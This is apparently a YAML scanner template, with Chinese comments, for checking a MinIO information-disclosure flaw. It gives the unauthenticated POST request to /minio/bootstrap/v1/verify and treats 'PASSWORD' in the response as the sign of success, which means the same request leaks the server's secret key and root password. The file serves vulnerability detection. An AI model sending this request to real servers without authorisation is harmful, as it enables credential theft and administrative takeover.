31 lines
819 B
YAML
31 lines
819 B
YAML
keyword: minio
|
||
name: MinIO信息泄露漏洞
|
||
description: |
|
||
在集群部署的Minio中,未授权的攻击者可发送恶意的HTTP请求来获取Minio环境变量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录Minio。
|
||
requests: # 为空代表默认或者不启用
|
||
path: "/minio/bootstrap/v1/verify"
|
||
method: POST
|
||
headers:
|
||
User-agent:
|
||
Content-length:
|
||
Accept:
|
||
Content-type:
|
||
Accept-Encoding:
|
||
Cookie:
|
||
Referer:
|
||
X-Forwarded-For:
|
||
body-raw: |-
|
||
|
||
response:
|
||
path: ""
|
||
status-code: 200
|
||
body: "PASSWORD" # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
|
||
headers:
|
||
Server:
|
||
Content-type:
|
||
Content-length:
|
||
Date:
|
||
Connection:
|
||
impact: |
|
||
泄露系统账号密码
|